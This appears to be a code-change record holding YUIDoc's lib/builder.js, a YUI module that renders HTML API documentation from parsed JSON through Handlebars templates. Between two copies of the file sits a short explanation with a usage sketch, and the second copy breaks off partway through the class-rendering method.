self.data.classes[info.extends]); classItems = self.mergeExtends(self.data.classes[info.extends], classItems); } } } return classItems; }, renderClass: function(cb, data, layout) { var self = this; var stack = new Y.Parallel(); Y.prepare([DEFAULT_THEME, themeDir], 
self.getProjectMeta(), function(err, opts) { //console.log(opts); if (err) { console.log(err); } opts.meta = Y.merge(opts.meta, data); opts.meta.title = self.data.project.name; opts.meta.moduleName = data.name; opts.meta.file = data.file; opts.meta.line = data.line; opts.meta = self.addFoundAt(opts.meta); opts.meta.projectRoot = '../'; opts.meta.projectAssets = '../assets'; opts = self.populateClasses(opts); opts = self.populateModules(opts); opts = self.populateFiles(opts); opts.meta.classDescription = self._parseCode(markdown(data.description || ' ')); opts.meta.methods = []; opts.meta.properties = []; opts.meta.attrs = []; opts.meta.events = []; opts.meta.extension_for = null; if (data.uses) { opts.meta.uses = data.uses; } if (data.entension_for && data.extension_for.length) { opts.meta.extension_for = data.extension_for; } if (data.extends) { opts.meta.extends = data.extends; } var classItems = []; self.data.classitems.forEach(function(i) { if (i.class === data.name) { classItems.push(i); } }); classItems = self.mergeExtends(data, classItems); if (data.is_constructor) { var i = Y.mix({}, data); i = self.augmentData(i); i.paramsList = []; if (i.params) { i.params.forEach(function(p, v) { var name = p.name; if (p.optional) { name = '[' + name + ((p.optdefault) ? '=' + p.optdefault : '') + ']' } i.paramsList.push(name); }); } //i.methodDescription = self._parseCode(markdown(i.description)); i.hasAccessType = i.access; i.hasParams = i.paramsList.length; if (i.paramsList.length) { i.paramsList = i.paramsList.join(', '); } else { i.paramsList = ' '; } i.returnType = ' '; if (i.return) { i.hasReturn = true; i.returnType = i.return.type; } //console.error(i); opts.meta.is_constructor = [i]; } classItems.forEach(function(i) { switch (i.itemtype) { case 'method': i = self.augmentData(i); i.paramsList = []; if (i.params) { i.params.forEach(function(p, v) { var name = p.name; if (p.optional) { name = '[' + name + ((p.optdefault) ? '=' + p.optdefault : '') + ']' } i.paramsList.push(name); }); } //i.methodDescription = self._parseCode(markdown(i.description || '')); i.methodDescription = self._parseCode(i.description); if (i.example && i.example.length) { if (i.example.forEach) { var e = ''; i.example.forEach(function(v) { e += self._parseCode(markdown(v)); }); i.example = e; } else { i.example = self._parseCode(markdown(i.example)); } } i.hasAccessType = i.access; i.hasParams = i.paramsList.length; if (i.paramsList.length) { i.paramsList = i.paramsList.join(', '); } else { i.paramsList = ' '; } i.returnType = ' '; if (i.return) { i.hasReturn = true; i.returnType = i.return.type; } // If this item is provided by a module other // than the module that provided the original // class, add the original module name to the // item's `providedBy` property so we can // indicate the relationship. 
if ((i.submodule || i.module) !== (data.submodule || data.module)) { i.providedBy = (i.submodule || i.module); } opts.meta.methods.push(i); break; case 'property': i = self.augmentData(i); //i.propertyDescription = self._parseCode(markdown(i.description || '')); i.propertyDescription = self._parseCode(i.description); if (!i.type) { i.type = 'unknown'; } if (i.final === '') { i.final = true; } if (i.example && i.example.length) { if (i.example.forEach) { var e = ''; i.example.forEach(function(v) { e += self._parseCode(markdown(v)); }); i.example = e; } else { i.example = self._parseCode(markdown(i.example)); } } // If this item is provided by a module other // than the module that provided the original // class, add the original module name to the // item's `providedBy` property so we can // indicate the relationship. if ((i.submodule || i.module) !== (data.submodule || data.module)) { i.providedBy = (i.submodule || i.module); } opts.meta.properties.push(i); break; case 'attribute': // fallthru case 'config': i = self.augmentData(i); //i.attrDescription = self._parseCode(markdown(i.description || '')); i.attrDescription = self._parseCode(i.description); if (i.itemtype === 'config') { i.config = true; } else { i.emit = self.options.attributesEmit; } if (i.example && i.example.length) { if (i.example.forEach) { var e = ''; i.example.forEach(function(v) { e += self._parseCode(markdown(v)); }); i.example = e; } else { i.example = self._parseCode(markdown(i.example)); } } // If this item is provided by a module other // than the module that provided the original // class, add the original module name to the // item's `providedBy` property so we can // indicate the relationship. if ((i.submodule || i.module) !== (data.submodule || data.module)) { i.providedBy = (i.submodule || i.module); } opts.meta.attrs.push(i); break; case 'event': i = self.augmentData(i); //i.eventDescription = self._parseCode(markdown(i.description || '')); i.eventDescription = self._parseCode(i.description); if (i.example && i.example.length) { if (i.example.forEach) { var e = ''; i.example.forEach(function(v) { e += self._parseCode(markdown(v)); }); i.example = e; } else { i.example = self._parseCode(markdown(i.example)); } } // If this item is provided by a module other // than the module that provided the original // class, add the original module name to the // item's `providedBy` property so we can // indicate the relationship. 
if ((i.submodule || i.module) !== (data.submodule || data.module)) { i.providedBy = (i.submodule || i.module); } opts.meta.events.push(i); break; } }); opts.meta.attrs.sort(self.nameSort); opts.meta.events.sort(self.nameSort); opts.meta.methods.sort(self.nameSort); opts.meta.properties.sort(self.nameSort); if (!opts.meta.methods.length) { delete opts.meta.methods; } if (!opts.meta.properties.length) { delete opts.meta.properties; } if (!opts.meta.attrs.length) { delete opts.meta.attrs; } if (!opts.meta.events.length) { delete opts.meta.events; } var view = new Y.DocView(opts.meta); var mainLayout = opts.layouts[layout]; self.render('{{>classes}}', view, mainLayout, opts.partials, stack.add(function(err, html) { self.files++; stack.html = html; stack.view = view; })); }); stack.done(function() { cb(stack.html, stack.view); }); }, /** * Generates the class files under "out"/classes/ * @method writeClasses * @param {Callback} cb The callback to execute after it's completed */ writeClasses: function(cb, layout) { layout = layout || 'main'; var self = this, stack = new Y.Parallel(); stack.html = []; stack.view = []; Y.log('Rendering and writing ' + Object.keys(self.data.classes).length + ' class pages.', 'info', 'builder'); Y.each(self.data.classes, function(v) { if (v.external) { return } self.renderClass(stack.add(function(html, view) { stack.html.push(html); stack.view.push(view); if (self.options.dumpview) { Y.Files.writeFile(path.join(self.options.outdir, 'json', 'classes_' + v.name + '.json'), JSON.stringify(view), stack.add(noop)); } Y.Files.writeFile(path.join(self.options.outdir, 'classes', v.name + '.html'), html, stack.add(noop)); }), v, layout); }); stack.done(function() { Y.log('Finished writing class files', 'info', 'builder'); cb(stack.html, stack.view); }); }, /** * Sort method of array of objects with a property called __name__ * @method nameSort * @param {Object} a First object to compare * @param {Object} b Second object to compare * @return {Number} 1, -1 or 0 for sorting. 
*/ nameSort: function(a, b) { if (!a.name || !b.name) { return 0; } var an = a.name.toLowerCase(), bn = b.name.toLowerCase(), ret = 0; if (an < bn) { ret = -1; } if (an > bn) { ret = 1 } return ret; }, /** * Generates the syntax files under `"out"/files/` * @method writeFiles * @param {Callback} cb The callback to execute after it's completed */ writeFiles: function(cb, layout) { layout = layout || 'main'; var self = this, stack = new Y.Parallel(); stack.html = []; stack.view = []; Y.log('Rendering and writing ' + Object.keys(self.data.files).length + ' source files.', 'info', 'builder'); Y.each(self.data.files, function(v) { if (v.external) { return } self.renderFile(stack.add(function(html, view, data) { if (!view || !data) { return; } stack.html.push(html); stack.view.push(view); if (self.options.dumpview) { Y.Files.writeFile(path.join(self.options.outdir, 'json', 'files_' + self.filterFileName(data.name) + '.json'), JSON.stringify(view), stack.add(noop)); } Y.Files.writeFile(path.join(self.options.outdir, 'files', self.filterFileName(data.name) + '.html'), html, stack.add(noop)); }), v, layout); }); stack.done(function() { Y.log('Finished writing source files', 'info', 'builder'); cb(stack.html, stack.view); }); }, renderFile: function(cb, data, layout) { var self = this; Y.prepare([DEFAULT_THEME, themeDir], self.getProjectMeta(), function(err, opts) { if (err) { console.log(err); } if (!data.name) { return; } opts.meta = Y.merge(opts.meta, data); opts.meta.title = self.data.project.name; opts.meta.moduleName = data.name; opts.meta.projectRoot = '../'; opts.meta.projectAssets = '../assets'; opts = self.populateClasses(opts); opts = self.populateModules(opts); opts = self.populateFiles(opts); opts.meta.fileName = data.name; fs.readFile(opts.meta.fileName, 'utf8', Y.rbind(function(err, str, opts, data) { if (err) { Y.log(err, 'error', 'builder'); cb(err); return; } opts.meta.fileData = str; var view = new Y.DocView(opts.meta, 'index'); var mainLayout = opts.layouts[layout]; self.render('{{>files}}', view, mainLayout, opts.partials, function(err, html) { self.files++; cb(html, view, data); }); }, this, opts, data)); }); }, writeAPIMeta: function(cb) { Y.log('Writing API Meta Data', 'info', 'builder'); var self = this; this.renderAPIMeta(function(js) { fs.writeFile(path.join(self.options.outdir, 'api.js'), js, 'utf8', cb); }); }, renderAPIMeta: function(cb) { var opts = { meta: {} }, self = this; opts = this.populateClasses(opts); opts = this.populateModules(opts); ['classes', 'modules'].forEach(function(id) { opts.meta[id].forEach(function(v, k) { opts.meta[id][k] = v.name; if (v.submodules) { v.submodules.forEach(function(s) { opts.meta[id].push(s.displayName); }); } }); opts.meta[id].sort(); }); var apijs = 'YUI.add("yuidoc-meta", function(Y) {\n' + ' Y.YUIDoc = { meta: ' + JSON.stringify(opts.meta, null, 4) + ' };\n' + '});'; cb(apijs); }, /** * Normalizes a file path to a writable filename: * * var path = 'lib/file.js'; * returns 'lib_file.js'; * * @method filterFileName * @param {String} f The filename to normalize * @return {String} The filtered file path */ filterFileName: function(f) { return f.replace(/[\/\\]/g, '_'); }, /** * Compiles the templates from the meta-data provided by DocParser * @method compile * @param {Callback} cb The callback to execute after it's completed */ compile: function(cb) { var self = this; var starttime = (new Date()).getTime(); Y.log('Compiling Templates', 'info', 'builder'); this.mixExternal(function() { self.makeDirs(function() { Y.log('Copying 
Assets', 'info', 'builder'); if (!Y.Files.isDirectory(path.join(self.options.outdir, 'assets'))) { fs.mkdirSync(path.join(self.options.outdir, 'assets'), 0777); } Y.Files.copyAssets([path.join(DEFAULT_THEME, 'assets'), path.join(themeDir, 'assets')], path.join(self.options.outdir, 'assets'), false, function() { var cstack = new Y.Parallel(); self.writeModules(cstack.add(function() { self.writeClasses(cstack.add(function() { if (!self.options.nocode) { self.writeFiles(cstack.add(noop)); } })); })); self.writeIndex(cstack.add(noop)); self.writeAPIMeta(cstack.add(noop)); cstack.done(function() { var endtime = (new Date()).getTime(); var timer = ((endtime - starttime) / 1000) + ' seconds'; Y.log('Finished writing ' + self.files + ' files in ' + timer, 'info', 'builder'); if (cb) { cb(); } }); }); }); }); } } });
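The new_contents above close the updated lib/builder.js: Y.DocBuilder takes an options object (outdir, themedir, nocode, dumpview, ...) plus the JSON produced by DocParser, and compile() drives makeDirs, asset copying and the write* methods. A minimal usage sketch follows; it assumes a YUI instance with the doc-builder module already registered (as yuidoc's own CLI arranges), and the project data shown is illustrative rather than taken from this record.

    // Sketch only: feeding DocParser-style data into DocBuilder.
    // The YUI bootstrap and the sample data below are assumptions for illustration.
    YUI().use('doc-builder', function (Y) {
        var json = {
            project: { name: 'MyProject' },                  // used for page titles
            files: {}, modules: {}, classes: {}, classitems: []
        };
        var options = {
            outdir: 'out',      // classes/, modules/, files/, assets/ and index.html are written here
            nocode: false,      // keep the "foundAt" links into the rendered source files
            dumpview: false     // set true to also dump each view as JSON under out/json/
        };
        var builder = new Y.DocBuilder(options, json);
        builder.compile(function () {
            console.log('Docs written:', builder.files, 'files');
        });
    });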
lib/builder.js
/* Copyright (c) 2011, Yahoo! Inc. All rights reserved. Code licensed under the BSD License: http://yuilibrary.com/license/ */ var markdown = require("node-markdown").Markdown, fs = require('graceful-fs'), noop = function() {}, path = require('path'), DEFAULT_RETURN_TAGS = 'code|em|strong|span|a|pre|dl|dd|dt|ul|li|ol', TEMPLATE, /** * Takes a type string and converts it to a "First letter upper cased" type. e.g. `(string -> String, object -> Object)` * @method fixType * @private * @param {String} t The type string to convert * @return {String} The fixed string */ fixType = function(t) { var firstChar = t.charAt(0), upperFirstChar = firstChar.toUpperCase(); if (firstChar !== upperFirstChar) { return upperFirstChar + t.substring(1); } return t; }; /** * Takes the `JSON` data from the `DocParser` class, creates and parses markdown and handlebars based templates to generate static HTML content * @class DocBuilder * @module yuidoc */ YUI.add('doc-builder', function(Y) { var print = function(items) { var out = '<ul>'; Y.each(items, function(i, k) { out += '<li>'; if (Y.Lang.isObject(i)) { if (!i.path) { out += k + '/' + print(i); } else { out += '<a href="../files/' + i.name + '.html">' + k + '</a>'; } } out += '</li>'; }); out += '</ul>'; return out; }; Y.Handlebars.registerHelper('buildFileTree', function(items, fn) { return print(items); }); var DEFAULT_THEME = themeDir = path.join(__dirname, '../', 'themes', 'default'); Y.DocBuilder = function(options, data) { this.options = options; if (options.themedir) { themeDir = options.themedir; } this.data = data; Y.log('Building..', 'info', 'builder'); this.files = 0; var self = this; Y.Handlebars.registerHelper('crossLink', function(item, fn) { var str = ''; if (!item) { item = ''; } if (item.indexOf('|') > 0) { var parts = item.split('|'), p = []; Y.each(parts, function(i) { p.push(self._parseCrossLink.call(self, i)); }); str = p.join(' | '); } else { str = self._parseCrossLink.call(self, item); } return str; }); Y.Handlebars.registerHelper('crossLinkModule', function(item, fn) { var str = item; if (self.data.modules[item]) { str = '<a href="../modules/' + item + '.html">' + item + '</a>'; } return str; }); Y.Handlebars.registerHelper('crossLinkRaw', function(item, fn) { var str = ''; if (!item) { item = ''; } if (item.indexOf('|') > 0) { var parts = item.split('|'), p = []; Y.each(parts, function(i) { p.push(self._parseCrossLink.call(self, i, true)); }); str = p.join(' | '); } else { str = self._parseCrossLink.call(self, item, true); } return str; }); this.cacheTemplates = true; if (options.cacheTemplates === false) { this.cacheTemplates = false; } }; Y.DocBuilder.prototype = { _parseCrossLink: function(item, raw) { item = fixType(item); var self = this; var base = '../', baseName = item, newWin = false, className = 'crosslink'; item = baseItem = Y.Lang.trim(item.replace('{', '').replace('}', '')); //Remove Cruft item = item.replace('*', '').replace('[', '').replace(']', ''); var link = false, href; if (self.data.classes[item]) { link = true; } else { if (self.data.classes[item.replace('.', '')]) { link = true; item = item.replace('.', ''); } } if (self.options.externalData) { if (self.data.classes[item]) { if (self.data.classes[item].external) { href = self.data.classes[item].path; base = self.options.externalData.base; className += ' external'; newWin = true; link = true; } } } /* if (!link && self.options.externalData) { var d = self.options.externalData; if (d && d.classes[item]) { href = d.classes[item].path; base = d.base; className += ' 
external'; newWin = true; link = true; } } */ if (item === 'Object' || item === 'Array') { link = false; } if (!href) { href = path.join(base, 'classes', item + '.html'); if (base.match(/^https?:\/\//)) { href = base + path.join('classes', item + '.html'); } } if (!link && self.options.linkNatives) { if (self.NATIVES && self.NATIVES[item]) { href = self.NATIVES_LINKER(item); if (href) { className += ' external'; newWin = true; link = true; } } } if (link) { item = '<a href="' + href + '" class="' + className + '"' + ((newWin) ? ' target="_blank"' : '') + '>' + baseItem + '</a>'; } return (raw) ? href : item; }, NATIVES: { 'Array': 1, 'Boolean': 1, 'Date': 1, 'decodeURI': 1, 'decodeURIComponent': 1, 'encodeURI': 1, 'encodeURIComponent': 1, 'eval': 1, 'Error': 1, 'EvalError': 1, 'Function': 1, 'Infinity': 1, 'isFinite': 1, 'isNaN': 1, 'Math': 1, 'NaN': 1, 'Number': 1, 'Object': 1, 'parseFloat': 1, 'parseInt': 1, 'RangeError': 1, 'ReferenceError': 1, 'RegExp': 1, 'String': 1, 'SyntaxError': 1, 'TypeError': 1, 'undefined': 1, 'URIError': 1, 'HTMLElement': 'https:/'+'/developer.mozilla.org/en/Document_Object_Model_(DOM)/', 'HTMLCollection': 'https:/'+'/developer.mozilla.org/en/Document_Object_Model_(DOM)/', 'DocumentFragment': 'https:/'+'/developer.mozilla.org/en/Document_Object_Model_(DOM)/', 'HTMLDocument': 'https:/'+'/developer.mozilla.org/en/Document_Object_Model_(DOM)/' }, NATIVES_LINKER: function(name) { var url = 'https:/'+'/developer.mozilla.org/en/JavaScript/Reference/Global_Objects/'; if (this.NATIVES[name] !== 1) { url = this.NATIVES[name]; } return url + name; }, _mixExternal: function() { var self = this; Y.log('External data received, mixing', 'info', 'builder'); var exData = self.options.externalData; ['files', 'classes', 'modules'].forEach(function(k) { Y.each(exData[k], function(item, key) { item.external = true; var file = item.name; if (!item.file) { file = self.filterFileName(item.name); } item.path = exData.base + path.join(k, file + '.html'); self.data[k][key] = item; }); }); Y.each(exData.classitems, function(item) { item.external = true; item.path = exData.base + path.join('files', self.filterFileName(item.file) + '.html'); self.data.classitems.push(item); }); }, mixExternal: function(cb) { var self = this, info = self.options.external; if (!info) { cb(); return; } if (!info.merge) { info.merge = 'mix'; } if (!info.data) { Y.log('External config found but no data path defined, skipping import.', 'warn', 'builder'); cb(); return; } if (!Y.Lang.isArray(info.data)) { info.data = [ info.data ]; } Y.log('Importing external documentation data.', 'info', 'builder'); var stack = new Y.Parallel(); info.data.forEach(function(i) { var base; if (i.match(/^https?:\/\//)) { base = i.replace('data.json', ''); Y.use('io-base', stack.add(function() { Y.io(i, { on: { complete: stack.add(function(id, e) { var data = JSON.parse(e.responseText); data.base = base; self.options.externalData = Y.mix(self.options.externalData || {}, data); }) } }); })); } else { base = path.dirname(path.resolve(i)); var data = Y.Files.getJSON(i); data.base = base; self.options.externalData = Y.mix(self.options.externalData || {}, data); } }); stack.done(function() { Y.log('Finished fetching remote data', 'info', 'builder'); self._mixExternal(); cb(); }); }, /** * The default tags to use in params descriptions (for Markdown). 
* @property defaultTags * @type String */ defaultReturnTags: DEFAULT_RETURN_TAGS, defaultTags: 'p|' + DEFAULT_RETURN_TAGS, /** * File counter * @property files * @type Number */ files: null, /** * Prep the meta data to be fed to Selleck * @method getProjectMeta * @return {Object} The project metadata */ _meta: null, getProjectMeta: function() { var obj = { meta: { yuiSeedUrl: 'http://yui.yahooapis.com/3.5.0pr4/build/yui/yui-min.js', yuiGridsUrl: 'http://yui.yahooapis.com/3.5.0pr4/build/cssgrids/cssgrids-min.css' } }; if (!this._meta) { try { var meta; if (fs.existsSync(path.join(themeDir, 'theme.json'))) { meta = Y.Files.getJSON(path.join(themeDir, 'theme.json')); } else if (DEFAULT_THEME !== themeDir) { if (fs.existsSync(path.join(DEFAULT_THEME))) { meta = Y.Files.getJSON(path.join(DEFAULT_THEME, 'theme.json')); } } if (meta) { obj.meta = meta; this._meta = meta; } } catch (e) {} } else { obj.meta = this._meta; } Y.each(this.data.project, function(v, k) { var key = k.substring(0, 1).toUpperCase() + k.substring(1, k.length); obj.meta['project' + key] = v; }); return obj }, /** * Populate the meta data for classes * @method populateClasses * @param {Object} opts The original options * @return {Object} The modified options */ populateClasses: function(opts) { opts.meta.classes = []; Y.each(this.data.classes, function(v) { if (v.external) { return } opts.meta.classes.push({ displayName: v.name, name: v.name}); }); opts.meta.classes.sort(this.nameSort); return opts; }, /** * Populate the meta data for modules * @method populateModules * @param {Object} opts The original options * @return {Object} The modified options */ populateModules: function(opts) { var self = this; opts.meta.modules = []; opts.meta.allModules = []; Y.each(this.data.modules, function(v) { if (v.external) { return } opts.meta.allModules.push({ displayName: v.displayName || v.name, name: self.filterFileName(v.name), description: v.description }); if (!v.is_submodule) { var o = { displayName: v.displayName || v.name, name: self.filterFileName(v.name) }; if (v.submodules) { o.submodules = []; Y.each(v.submodules, function(i, k) { moddef = self.data.modules[k]; if (moddef) { o.submodules.push({ displayName: k, description: moddef.description }); } else { //Y.log('Submodule data missing: ' + k + ' for ' + v.name, 'warn', 'builder'); } }); o.submodules.sort(self.nameSort); } opts.meta.modules.push(o); } }); opts.meta.modules.sort(this.nameSort); opts.meta.allModules.sort(this.nameSort); return opts; }, /** * Populate the meta data for files * @method populateFiles * @param {Object} opts The original options * @return {Object} The modified options */ populateFiles: function(opts) { var self = this; opts.meta.files = []; Y.each(this.data.files, function(v) { if (v.external) { return } opts.meta.files.push({ displayName: v.name, name: self.filterFileName(v.name), path: v.path || v.name }); }); var tree = {}; var files = []; Y.each(this.data.files, function(v) { if (v.external) { return } files.push(v.name); }); files.sort(); Y.each(files, function(v) { var p = v.split('/'), par; p.forEach(function(i, k) { if (!par) { if (!tree[i]) { tree[i] = {}; } par = tree[i]; } else { if (!par[i]) { par[i] = {}; } if (k + 1 === p.length) { par[i] = { path: v, name: self.filterFileName(v) }; } par = par[i]; } }); }); opts.meta.fileTree = tree; return opts; }, addFoundAt: function(a) { var self = this; if (a.file && a.line && !self.options.nocode) { a.foundAt = '../files/' + self.filterFileName(a.file) + '.html#l' + a.line; if (a.path) { a.foundAt 
= a.path + '#l' + a.line; } } return a; }, /** * Augments the **DocParser** meta data to provide default values for certain keys as well as parses all descriptions * with the `Markdown Parser` * @method augmentData * @param {Object} o The object to recurse and augment * @return {Object} The augmented object */ augmentData: function(o) { var self = this; o = self.addFoundAt(o); Y.each(o, function(i, k1) { if (i && i.forEach) { Y.each(i, function(a, k) { if (!(a instanceof Object)) { return; } if (!a.type) { a.type = 'Object'; //Default type is Object } if (a.final === '') { a.final = true; } if (!a.description) { a.description = ' '; } else { a.description = markdown(a.description, true, self.defaultTags); } if (a.example) { a.example = markdown(a.example, true, self.defaultTags); } a = self.addFoundAt(a); Y.each(a, function(c, d) { if (c.forEach || (c instanceof Object)) { c = self.augmentData(c); a[d] = c; } }); o[k1][k] = a; }); } else if (i instanceof Object) { i = self.addFoundAt(i); Y.each(i, function(v, k) { if (k === 'final') { o[k1][k] = true; } if (k === 'description' || k === 'example') { if (k1 === 'return') { o[k1][k] = markdown(v, true, self.defaultReturnTags); } else if (v.forEach || (v instanceof Object)) { o[k1][k] = self.augmentData(v); } else { o[k1][k] = markdown(v, true, self.defaultTags); } } }); } else if (k1 === 'description' || k1 === 'example') { o[k1] = markdown(i, true, self.defaultTags); } }); return o; }, /** * Makes the default directories needed * @method makeDirs * @param {Callback} cb The callback to execute after it's completed */ makeDirs: function(cb) { var self = this; var dirs = ['classes', 'modules', 'files']; if (self.options.dumpview) { dirs.push('json'); } var writeRedirect = function(dir, file, cb) { path.exists(file, function(x) { if (x) { var out = path.join(dir, 'index.html'); fs.createReadStream(file).pipe(fs.createWriteStream(out)); } cb(); }); }; var defaultIndex = path.join(themeDir, 'assets', 'index.html'); var stack = new Y.Parallel(); Y.log('Making default directories: ' + dirs.join(','), 'info', 'builder'); dirs.forEach(function(d) { var dir = path.join(self.options.outdir, d); path.exists(dir, stack.add(function(x) { if (!x) { fs.mkdir(dir, 0777, stack.add(function() { writeRedirect(dir, defaultIndex, stack.add(noop)); })); } else { writeRedirect(dir, defaultIndex, stack.add(noop)); } })); }); stack.done(function() { if (cb) { cb(); } }); }, /** * Parses `<pre><code>` tags and adds the __prettyprint__ `className` to them * @method _parseCode * @private * @param {HTML} html The HTML to parse * @return {HTML} The parsed HTML */ _parseCode: function (html) { html = html || ''; html = html.replace(/<pre><code>/g, '<pre class="code"><code class="prettyprint">'); return html; }, /** * Ported from [Selleck](https://github.com/rgrove/selleck), this handles ```'s in fields that are not parsed by the **Markdown** parser. * @method _inlineCode * @private * @param {HTML} html The HTML to parse * @return {HTML} The parsed HTML */ _inlineCode: function(html) { html = html.replace(/\\`/g, '__{{SELLECK_BACKTICK}}__'); html = html.replace(/`(.+?)`/g, function (match, code) { return '<code>' + Y.escapeHTML(code) + '</code>'; }); html = html.replace(/__\{\{SELLECK_BACKTICK\}\}__/g, '`'); return html; }, /** * Ported from [Selleck](https://github.com/rgrove/selleck) Renders the handlebars templates with the default View class. 
* @method render * @param {HTML} source The default template to parse * @param {Class} view The default view handler * @param {HTML} [layout=null] The HTML from the layout to use. * @param {Object} [partials=object] List of partials to include in this template * @param {Callback} callback * @param {Error} callback.err * @param {HTML} callback.html The assembled template markup */ render: function(source, view, layout, partials, callback) { var html = []; function buffer(line) { html.push(line); } // Allow callback as third or fourth param. if (typeof partials === 'function') { callback = partials; partials = {}; } else if (typeof layout === 'function') { callback = layout; layout = null; } var parts = Y.merge(partials || {}, { layout_content: source }); Y.each(parts, function(source, name) { Y.Handlebars.registerPartial(name, source); }); if (!TEMPLATE || !this.cacheTemplates) { TEMPLATE = Y.Handlebars.compile(layout); } var _v = {}; for (var k in view) { if (Y.Lang.isFunction(view[k])) { _v[k] = view[k](); } else { _v[k] = view[k]; } }; html = TEMPLATE(_v); html = this._inlineCode(html); callback(null, html); }, /** * Render the index file * @method renderIndex * @param {Function} cb The callback fired when complete * @param {String} cb.html The HTML to render this view * @param {Object} cv.view The View Data */ renderIndex: function(cb) { var self = this; Y.prepare([DEFAULT_THEME, themeDir], self.getProjectMeta(), function(err, opts) { opts.meta.title = self.data.project.name; opts.meta.projectRoot = './'; opts.meta.projectAssets = './assets'; opts = self.populateClasses(opts); opts = self.populateModules(opts); var view = new Y.DocView(opts.meta); self.render('{{>index}}', view, opts.layouts.main, opts.partials, function(err, html) { self.files++; cb(html, view); }); }); }, /** * Generates the index.html file * @method writeIndex * @param {Callback} cb The callback to execute after it's completed */ writeIndex: function(cb) { var self = this, stack = new Y.Parallel(); Y.log('Preparing index.html', 'info', 'builder'); self.renderIndex(stack.add(function(html, view) { stack.html = html; stack.view = view; if (self.options.dumpview) { Y.Files.writeFile(path.join(self.options.outdir, 'json', 'index.json'), JSON.stringify(view), stack.add(noop)); } Y.Files.writeFile(path.join(self.options.outdir, 'index.html'), html, stack.add(noop)); })); stack.done(function(html, view) { Y.log('Writing index.html', 'info', 'builder'); cb(stack.html, stack.view); }); }, renderModule: function(cb, data, layout) { var self = this; var stack = new Y.Parallel(); data.displayName = data.name; data.name = self.filterFileName(data.name); Y.prepare([DEFAULT_THEME, themeDir], self.getProjectMeta(), function(err, opts) { opts.meta = Y.merge(opts.meta, data); //opts.meta.htmlTitle = v.name + ': ' + self.data.project.name; opts.meta.title = self.data.project.name; opts.meta.moduleName = data.displayName || data.name; opts.meta.moduleDescription = self._parseCode(markdown(data.description || ' ')); opts.meta.file = data.file; opts.meta.line = data.line; opts.meta = self.addFoundAt(opts.meta); opts.meta.projectRoot = '../'; opts.meta.projectAssets = '../assets'; opts = self.populateClasses(opts); opts = self.populateModules(opts); opts = self.populateFiles(opts); if (data.classes && Object.keys(data.classes).length) { opts.meta.moduleClasses = []; Y.each(Object.keys(data.classes), function(name) { var i = self.data.classes[name]; if (i) { opts.meta.moduleClasses.push({ name: i.name, displayName: i.name }); } }); 
opts.meta.moduleClasses.sort(self.nameSort); } if (data.submodules && Object.keys(data.submodules).length) { opts.meta.subModules = []; Y.each(Object.keys(data.submodules), function(name) { var i = self.data.modules[name]; if (i) { opts.meta.subModules.push({ name: i.name, displayName: i.name, description: i.description }); } }); opts.meta.subModules.sort(self.nameSort); } var view = new Y.DocView(opts.meta); var mainLayout = opts.layouts[layout]; self.render('{{>module}}', view, mainLayout, opts.partials, stack.add(function(err, html) { self.files++; stack.html = html; stack.view = view; })); }); stack.done(function() { cb(stack.html, stack.view); }); }, /** * Generates the module files under "out"/modules/ * @method writeModules * @param {Callback} cb The callback to execute after it's completed */ writeModules: function(cb, layout) { layout = layout || 'main'; var self = this, stack = new Y.Parallel(); stack.html = []; stack.view = []; Y.log('Rendering and writing ' + Object.keys(self.data.modules).length + ' modules pages.', 'info', 'builder'); Y.each(self.data.modules, function(v) { if (v.external) { return } self.renderModule(function(html, view) { stack.html.push(html); stack.view.push(view); if (self.options.dumpview) { Y.Files.writeFile(path.join(self.options.outdir, 'json', 'module_' + v.name + '.json'), JSON.stringify(view), stack.add(noop)); } Y.Files.writeFile(path.join(self.options.outdir, 'modules', v.name + '.html'), html, stack.add(noop)); }, v, layout); }); stack.done(function() { Y.log('Finished writing module files', 'info', 'builder'); cb(stack.html, stack.view); }); }, hasProperty: function(a, b) { var other; var h = Y.some(a, function(i, k) { if ((i.itemtype === b.itemtype) && (i.name === b.name)) { other = k; return true; } }); return other; }, mergeExtends: function(info, classItems) { var self = this; if (info.extends || info.uses) { var hasItems = {}; hasItems[info.extends] = 1; if (info.uses) { info.uses.forEach(function(v) { hasItems[v] = 1; }); } self.data.classitems.forEach(function(v) { //console.error(v.class, '==', info.extends); if (hasItems[v.class]) { if (!v.static) { var override = self.hasProperty(classItems, v); if (!override) { //This method was extended from the parent class but not over written //console.error('Merging extends from', v.class, 'onto', info.name); var q = Y.merge({}, v); q.extended_from = v.class; classItems.push(q); } else { //This method was extended from the parent and overwritten in this class var q = Y.merge({}, v); q = self.augmentData(q); classItems[override].overwritten_from = q; } } } }); if (self.data.classes[info.extends]) { if (self.data.classes[info.extends].extends || self.data.classes[info.extends].uses) { //console.error('Stepping down to:', self.data.classes[info.extends]); classItems = self.mergeExtends(self.data.classes[info.extends], classItems); } } } return classItems; }, renderClass: function(cb, data, layout) { var self = this; var stack = new Y.Parallel(); Y.prepare([DEFAULT_THEME, themeDir], self.getProjectMeta(), function(err, opts) { //console.log(opts); if (err) { console.log(err); } opts.meta = Y.merge(opts.meta, data); opts.meta.title = self.data.project.name; opts.meta.moduleName = data.name; opts.meta.file = data.file; opts.meta.line = data.line; opts.meta = self.addFoundAt(opts.meta); opts.meta.projectRoot = '../'; opts.meta.projectAssets = '../assets'; opts = self.populateClasses(opts); opts = self.populateModules(opts); opts = self.populateFiles(opts); opts.meta.classDescription = 
self._parseCode(markdown(data.description || ' ')); opts.meta.methods = []; opts.meta.properties = []; opts.meta.attrs = []; opts.meta.events = []; opts.meta.extension_for = null; if (data.uses) { opts.meta.uses = data.uses; } if (data.entension_for && data.extension_for.length) { opts.meta.extension_for = data.extension_for; } if (data.extends) { opts.meta.extends = data.extends; } var classItems = []; self.data.classitems.forEach(function(i) { if (i.class === data.name) { classItems.push(i); } }); classItems = self.mergeExtends(data, classItems); if (data.is_constructor) { var i = Y.mix({}, data); i = self.augmentData(i); i.paramsList = []; if (i.params) { i.params.forEach(function(p, v) { var name = p.name; if (p.optional) { name = '[' + name + ((p.optdefault) ? '=' + p.optdefault : '') + ']' } i.paramsList.push(name); }); } //i.methodDescription = self._parseCode(markdown(i.description)); i.hasAccessType = i.access; i.hasParams = i.paramsList.length; if (i.paramsList.length) { i.paramsList = i.paramsList.join(', '); } else { i.paramsList = ' '; } i.returnType = ' '; if (i.return) { i.hasReturn = true; i.returnType = i.return.type; } //console.error(i); opts.meta.is_constructor = [i]; } classItems.forEach(function(i) { switch (i.itemtype) { case 'method': i = self.augmentData(i); i.paramsList = []; if (i.params) { i.params.forEach(function(p, v) { var name = p.name; if (p.optional) { name = '[' + name + 